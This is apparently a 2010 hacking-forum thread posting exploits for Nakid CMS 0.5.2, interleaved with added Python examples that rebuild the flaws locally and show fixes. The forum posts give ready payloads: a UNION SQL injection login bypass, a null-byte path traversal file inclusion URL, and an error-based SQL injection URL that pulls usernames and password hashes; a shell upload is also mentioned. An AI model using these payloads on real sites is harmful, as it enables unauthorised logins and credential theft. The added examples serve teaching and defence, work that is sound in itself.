Nakid CMS 0.5.2

Discussion in 'Web vulnerabilities' started by geezer.code, 20 Mar 2010.

  1. geezer.code

    NakidCMS 0.5.2

    Authorization Bypass && Blind SQLi
    login_process.php
    mq=off
    PHP:
    $post_username = $_POST['username'];
    $post_password = md5($_POST['password']);
    // username goes into the query unescaped (magic_quotes off)
    $users_query = mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");
    if(mysql_num_rows($users_query)<1){
      die("<p class='error'>No such user found</p>");
    }
    $users_array = mysql_fetch_array($users_query);
    // the hash comparison happens in PHP against whatever row the query returned
    if($post_password != $users_array['password']){
      die("<p class='error'>Invalid Password</p>");
    }
    $_SESSION['uid'] = $users_array['id'];
    echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
    redirect_page("index.php?p=home");
    Exploit:
    Code:
    index.php?p=login_process
    POST
    username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
    password=pwd
    
    P.S.
    Shell upload via the gallery module.
     
    #1 geezer.code, 20 Mar 2010
    Last edited: 20 Mar 2010
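The bypass from the post above, replayed as an added example (not code from Nakid CMS or the poster): the vulnerable login flow is rebuilt against an in-memory SQLite copy of the users table and the posted UNION payload is run through it, beside the parameterised form that defeats it. Assumptions: SQLite stands in for MySQL, so the MySQL `#` line comment in the payload is written as `-- ` here; the table prefix, the admin row and its password are constructed test data.

```python
# Added example, not code from Nakid CMS or the poster: replays the UNION
# bypass against an in-memory SQLite copy of the users table, then shows
# the parameterised query that defeats it.
# Assumptions: SQLite stands in for MySQL, so the MySQL '#' comment in the
# posted payload is written as '-- ' here; the table prefix, the admin row
# and its password are constructed test data.
import hashlib
import sqlite3

TABLE_PREFIX = "nakid_"  # plays the role of $system_table_prefix


def make_db():
    """Constructed users table with one admin whose password the attacker does not know."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE {TABLE_PREFIX}users "
               "(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # the application stores md5(password), as login_process.php shows
    db.execute(f"INSERT INTO {TABLE_PREFIX}users VALUES (1, 'admin', ?)",
               (hashlib.md5(b"correct horse battery").hexdigest(),))
    return db


def login_vulnerable(db, username, password):
    """Same control flow as login_process.php: the username is concatenated into
    the query and the md5 comparison happens application-side, so any row the
    attacker can UNION in is accepted as the user record."""
    post_password = hashlib.md5(password.encode()).hexdigest()
    sql = (f"SELECT id,password FROM {TABLE_PREFIX}users "
           f"WHERE username = '{username}' LIMIT 1")
    row = db.execute(sql).fetchone()
    if row is None:
        return None                       # "No such user found"
    uid, stored_hash = row
    if post_password != stored_hash:
        return None                       # "Invalid Password"
    return uid                            # becomes $_SESSION['uid']


def login_fixed(db, username, password):
    """Bound parameter: the payload is looked up as a literal username and matches nothing."""
    post_password = hashlib.md5(password.encode()).hexdigest()  # md5 kept only to match the schema
    row = db.execute(f"SELECT id,password FROM {TABLE_PREFIX}users "
                     "WHERE username = ? LIMIT 1", (username,)).fetchone()
    if row is None or post_password != row[1]:
        return None
    return row[0]


def bypass_payload(chosen_password="pwd"):
    """The posted payload: an injected row whose 'password' column is the md5 of a
    password the attacker picks (the posted 9003d1df... is md5('pwd')), with the
    rest of the original statement commented out."""
    fake_hash = hashlib.md5(chosen_password.encode()).hexdigest()
    return f"' union select 1 id,'{fake_hash}' password -- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, wrong password:", login_vulnerable(db, "admin", "guess"))
    print("vulnerable, UNION payload: ", login_vulnerable(db, bypass_payload("pwd"), "pwd"))
    print("fixed, UNION payload:      ", login_fixed(db, bypass_payload("pwd"), "pwd"))
```

The point the rebuild makes visible: the injected row never touches the real admin record. The first SELECT matches nothing, the UNION supplies `(1, md5('pwd'))`, and because the hash check runs in PHP against that returned row, logging in as uid 1 needs nothing but the password the attacker chose. Binding the username as a parameter removes the UNION; moving the comparison into the WHERE clause would not be enough on its own while the string is still concatenated.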
  2. RulleR

    Local File Inclusion

    Vuln file: /index.php
    Code:
    file:/includes/php/first.php
    /*...*/
    //Get Current Page
    if(!empty($_GET['p'])){
    	$core['page'] = strtolower($_GET['p']);
    }
    if(!empty($_GET['pt'])){
    	$core['page_type'] = strtolower($_GET['pt']);
    }
    /*...*/
    			if($core['page_type'] == "core"){
    				$page_string = "includes/pages/".$core['page'].".php";
    				if(file_exists($page_string)){
    					include($page_string);
    					$page_found = true;
    				}
    			}
    /*...*/
    Need: magic_quotes = off
    Exploit:
    Code:
    http://[host]/[path]/index.php?pt=core&p=../../../../../../../[local_file]%00
    Blind SQL injection

    Vuln file: /includes/pages/users_data.php
    Code:
    /*...*/
    $page = $_GET['page'];   //Requested page
    $limit = $_GET['rows'];  //Num of rows
    $sidx = $_GET['sidx'];   //Sort by
    $sord = $_GET['sord'];   //Sort order
    /*...*/
    	$SQL = "SELECT * FROM ".$core['table_prefix']."users";
    /*...*/
    	if(!empty($sidx)){
    		$SQL .= " ORDER BY ".$sidx." ".$sord;
    	}
    /*...*/
    Exploit:
    Code:
    http://[host]/[path]/includes/pages/users_data.php?sidx=1+and+(1,2)=(select+*+from(select+name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1),name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1))x)
     
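The two sinks from the post above, rebuilt as an added example (not code from Nakid CMS or the poster): the include logic of includes/php/first.php and the ORDER BY of includes/pages/users_data.php, each beside a hardened version. Assumptions: the directory tree is constructed in a temporary directory, truncation at NUL stands in for the pre-5.3.4 PHP behaviour the `%00` relies on, and the sortable column names are a guessed allowlist built from the columns the thread already names.

```python
# Added example, not code from Nakid CMS or the poster: emulates the include
# in includes/php/first.php and the ORDER BY in includes/pages/users_data.php
# and puts a hardened version beside each.
# Assumptions: the tree is constructed in a temporary directory, NUL
# truncation stands in for pre-5.3.4 PHP behaviour, and SORTABLE is a guessed
# allowlist of column names.
import os
import re
import tempfile

PAGES_DIR = os.path.join("includes", "pages")
PAGE_NAME = re.compile(r"[a-z0-9_]+")    # what a legitimate $_GET['p'] looks like
SORTABLE = {"id", "username"}            # assumed allowlist for $_GET['sidx']


def make_tree():
    """Constructed layout: <tmp>/www is the web root, <tmp>/secret lies outside it."""
    tmp = tempfile.mkdtemp()
    root = os.path.join(tmp, "www")
    os.makedirs(os.path.join(root, PAGES_DIR))
    os.makedirs(os.path.join(tmp, "secret"))
    with open(os.path.join(root, PAGES_DIR, "home.php"), "w") as fh:
        fh.write("<?php echo 'home'; ?>")
    with open(os.path.join(tmp, "secret", "config.txt"), "w") as fh:
        fh.write("db_pass=constructed")
    return root


def resolve_page_vulnerable(root, p):
    """first.php as posted: strtolower, concatenate, file_exists, include."""
    page_string = os.path.join(root, PAGES_DIR, p.lower() + ".php")
    page_string = page_string.split("\0", 1)[0]   # old PHP stops at NUL, so ".php" is lost
    return page_string if os.path.exists(page_string) else None


def resolve_page_fixed(root, p):
    """Accept only a bare page name, then confirm the resolved path is still
    under the pages directory before handing it back for inclusion."""
    name = p.lower()
    if "\0" in name or not PAGE_NAME.fullmatch(name):
        return None
    base = os.path.realpath(os.path.join(root, PAGES_DIR))
    target = os.path.realpath(os.path.join(base, name + ".php"))
    if os.path.commonpath([base, target]) != base or not os.path.isfile(target):
        return None
    return target


def users_query_vulnerable(table_prefix, sidx, sord):
    """users_data.php as posted: sort column and direction pasted verbatim."""
    sql = f"SELECT * FROM {table_prefix}users"
    if sidx:
        sql += f" ORDER BY {sidx} {sord}"
    return sql


def users_query_fixed(table_prefix, sidx, sord):
    """Identifiers cannot be bound as parameters, so map them through an allowlist."""
    sql = f"SELECT * FROM {table_prefix}users"
    if sidx:
        if sidx not in SORTABLE:
            return None
        sql += f" ORDER BY {sidx} " + ("DESC" if sord.lower() == "desc" else "ASC")
    return sql


if __name__ == "__main__":
    root = make_tree()
    lfi = "../../../secret/config.txt\0"   # three ../ climb from www/includes/pages to <tmp>
    print(resolve_page_vulnerable(root, lfi))
    print(resolve_page_fixed(root, lfi))
    print(users_query_vulnerable("nakid_", "1 and (1,2)=(select 1)", ""))
    print(users_query_fixed("nakid_", "1 and (1,2)=(select 1)", ""))
```

The traversal payload carries exactly as many `../` as the constructed tree needs; the posted exploit uses a longer run because excess `..` components are harmless once the filesystem root is reached. For the ORDER BY, note that escaping does nothing here since the injection point is an identifier, not a string literal, which is why the fix is an allowlist rather than a quoting function.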
  3. Kakoytoxaker

    РОА leak